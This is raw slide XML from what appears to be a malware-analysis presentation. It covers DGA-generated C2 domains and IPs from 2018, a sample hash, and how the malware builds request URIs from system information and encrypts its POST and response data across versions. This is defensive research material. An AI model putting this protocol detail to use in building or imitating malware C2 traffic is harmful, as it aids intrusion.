              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>2018-7-15: 05319d803447.com (193.124.189.181)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>2018-7-30: ae0acb2d2247.com (212.22.77.112)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>2018-8-6: 7f05c3baa647.com (212.22.77.112)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>2018-8-15: 8c28b40a0b47.com (46.148.26.106)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>2018-8-21: 41b53042c147.com (46.148.26.106)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>2018-8-27: 02657b649147.com (46.148.26.106)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>2018-9-9: 77734a166347.com (46.148.26.106)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>2018-10-18: 3bd083c69647.com (46.148.26.106)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DGA Activity (1 config / ~Oct 2018)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10F8D07B-A0F9-E845-85CF-2FF529822448}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1752600"/>
            <a:ext cx="10972800" cy="4351338"/>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Clr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="2000" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="65656A"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="465138" indent="-227013" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst/>
              <a:defRPr sz="1800" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="65656A"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="693738" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:tabLst/>
              <a:defRPr sz="1600" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="65656A"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="922338" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr sz="1400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1150938" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLs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ingdings" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B235084-CFE6-6D49-8CD1-9204FE88783F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="5727853"/>
            <a:ext cx="9906000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sample: 5ac06f2cf2d27cc079778738c39eec3c64853880c43b60395899357fe8e2a31c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2889936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Command and Control (Requests)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="62484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95BE08A6-D8AE-274C-86F7-3DC1762CB619}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="560927" y="1371600"/>
            <a:ext cx="11374945" cy="3657600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1336224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dirty="0"/>
              <a:t>Initial part of the URI is generated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“/&lt;2-10 random alphanumeric characters&gt;/”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Following system information is gathered into a buffer “sysinfo”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Computer name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>InstallDate (from Registry)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CRC32 of DigitalProductId (from Registry)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CRC32 of OSVERSIONINFOEX structure (from GetVersionEx Windows API)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“sysinfo” is SHA256 hashed, but only the first 16-bytes of the hash are used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The 16-byte hash is XORed with the initial part of the URI from step 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The result is uppercase hex encoded</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“/”s are randomly added</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Request URI (2.1.0 – 2.1.3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3321977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dirty="0"/>
              <a:t>Initial part of the URI is generated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“/&lt;2-10 random alphanumeric characters&gt;/”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Following system information is gathered into a buffer “sysinfo”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Computer name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>InstallDate (from Registry)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CRC32 of DigitalProductId (from Registry)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CRC32 of OSVERSIONINFOEX structure (from GetVersionEx Windows API)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“sysinfo” is SHA256 hashed, but only the first 16-bytes of the hash are used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The 16-byte hash is XORed with the initial part of the URI from step 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The result is uppercase hex encoded</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The result is base64 encoded</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+, /, = are translated into -, _, “”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“/”s are randomly added</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Request URI (2.2.1 – present)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E443ECE4-2903-E54E-98D6-C9CA8CEE5E48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7315200" y="3399784"/>
            <a:ext cx="3492500" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2102404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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Offset 0x0: placeholder (32 bytes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Offset 0x20: RSA encrypted AES key (256 bytes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Offset 0x120: AES256 IV (16 bytes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Offset 0x130: AES256 CBC encrypted data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>sha256.update(uri + enc_post_data[32:])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Offset 0x0: placeholder (32 bytes)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Offset 0x0: SHA256 hash (32 bytes)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="274638"/>
            <a:ext cx="10972800" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>POST Data Decryption</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1610775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868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>POST Data Decryption (2.1.0 – 2.1.3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Content Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2B903F0-66DC-404F-9857-BD8DFF8AA55D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1143000"/>
            <a:ext cx="8833324" cy="4765609"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1801453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868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>POST Data Decryption (2.2.1 – present)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7F57C33-C1D9-674D-8B10-F6E29397A38F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="175571" y="1136176"/>
            <a:ext cx="11421614" cy="1703138"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1378159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Naming (Panel)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5ADDF7FC-DBDA-0543-AA6A-E3969708D83C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="589547" y="1128836"/>
            <a:ext cx="4483100" cy="5055759"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F559E3A-9E8D-3249-8278-9BEF6206E960}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="5715000"/>
            <a:ext cx="7327712" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Source: https://twitter.com/CryptoInsane/status/957185222608609281</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="219312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868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Request Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43FA9BFB-E862-7442-A8B8-B8E9B235AFDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1143000"/>
            <a:ext cx="8070850" cy="4363988"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="71422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Command and Control (Response)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="62484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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D82833C1-CD77-B242-8536-0E18A69CD2C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1339850"/>
            <a:ext cx="11430000" cy="4178300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1300231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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Offset 0x0: SHA256 digest (32 bytes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Offset 0x20: AES256 IV (16 bytes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Offset 0x30: AES256 CBC encrypted data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The key will be the randomly generated AES key sent along in the request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="274638"/>
            <a:ext cx="10972800" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Response Data Decryption Layer 1 (2.1.0 - 2.1.3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A42DC4C2-95EE-024F-B884-75FB9DA84845}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
